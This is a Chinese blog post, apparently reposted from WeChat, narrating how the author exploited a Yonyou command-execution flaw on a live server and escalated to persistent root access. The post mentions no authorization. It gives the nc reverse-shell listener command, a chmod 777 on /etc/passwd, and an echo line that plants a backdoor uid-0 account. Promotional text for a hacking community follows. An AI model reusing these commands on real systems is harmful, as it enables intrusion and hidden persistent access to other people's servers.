渗透测试 | 一次实战远程命令执行漏洞并提权

admin 2023年1月23日15:11:48评论44 views字数 1032阅读3分26秒阅读模式

前言

某站用友的命令执行漏洞,测试print hello发现可以执行命令

渗透测试 | 一次实战远程命令执行漏洞并提权

whami id 都查一波权限,发现是root权限这么大,很好搞啊

渗透测试 | 一次实战远程命令执行漏洞并提权

ps -ef|grep sshd 查一波 发现可以ssh连接,直接useradd 用户,但是整个shell无法给用户添加密码,无法远程登录,怎么搞,直接读shadow哈希,爆破密码
渗透测试 | 一次实战远程命令执行漏洞并提权
渗透测试 | 一次实战远程命令执行漏洞并提权
爆破无结果,头大,怎么搞,思考5分钟,可以直接写passwd啊,试一波
渗透测试 | 一次实战远程命令执行漏洞并提权
再次查看shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是544 ,直接chmod 777 /etc/passwd 改权限,继续写,依然写不进去,换了各种姿势,都不行,难住我了,突然想起了nc反弹,一般linux都装有nc,这个有没有,查一波
渗透测试 | 一次实战远程命令执行漏洞并提权
果然不错,有nc,通过dnslog查一下是否有外连
渗透测试 | 一次实战远程命令执行漏洞并提权
渗透测试 | 一次实战远程命令执行漏洞并提权
能ping通,果然能外连,那就可以通过nc反弹搞一波了,本地的攻击机在内网,内网穿透一波
我一般用https://www.uulap.com/ 大家可以试试
将本地的6666口映射到公网
渗透测试 | 一次实战远程命令执行漏洞并提权
本地建立监听 nc -l -n -v -p 6666
渗透测试 | 一次实战远程命令执行漏洞并提权
让目标机进行nc反弹
渗透测试 | 一次实战远程命令执行漏洞并提权
果然反弹回来了,直接上命令,加用户
echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd
渗透测试 | 一次实战远程命令执行漏洞并提权查看已经添加成功渗透测试 | 一次实战远程命令执行漏洞并提权
直接ssh连接,发现是阿里云的服务器
渗透测试 | 一次实战远程命令执行漏洞并提权
至此结束收工!

文章转自巡安似海

星 球 免 费 福 利



 转发公众号本文到朋友圈

 截图到公众号后台第1、3、5名获取免费进入星球


欢 迎 加 入 星 球 !

代码审计+各类渗透小白学习资源+各种资料文档+各种工具

进成员内部群


渗透测试 | 一次实战远程命令执行漏洞并提权



星球的最近主题和星球内部工具一些展示

渗透测试 | 一次实战远程命令执行漏洞并提权

渗透测试 | 一次实战远程命令执行漏洞并提权

渗透测试 | 一次实战远程命令执行漏洞并提权


渗透测试 | 一次实战远程命令执行漏洞并提权

渗透测试 | 一次实战远程命令执行漏洞并提权


关 注 有 礼



关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

渗透测试 | 一次实战远程命令执行漏洞并提权 还在等什么?赶紧点击下方名片关注学习吧!渗透测试 | 一次实战远程命令执行漏洞并提权


渗透测试 | 一次实战远程命令执行漏洞并提权



群聊 | 技术交流群-群除我佬


干货|史上最全一句话木马


干货 | CS绕过vultr特征检测修改算法


实战 | 用中国人写的红队服务器搞一次内网穿透练习


实战 | 渗透某培训平台经历


实战 | 一次曲折的钓鱼溯源反制


免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

原文始发于微信公众号(渗透安全团队):渗透测试 | 一次实战远程命令执行漏洞并提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月23日15:11:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试 | 一次实战远程命令执行漏洞并提权https://cn-sec.com/archives/1407544.html

发表评论

匿名网友 填写信息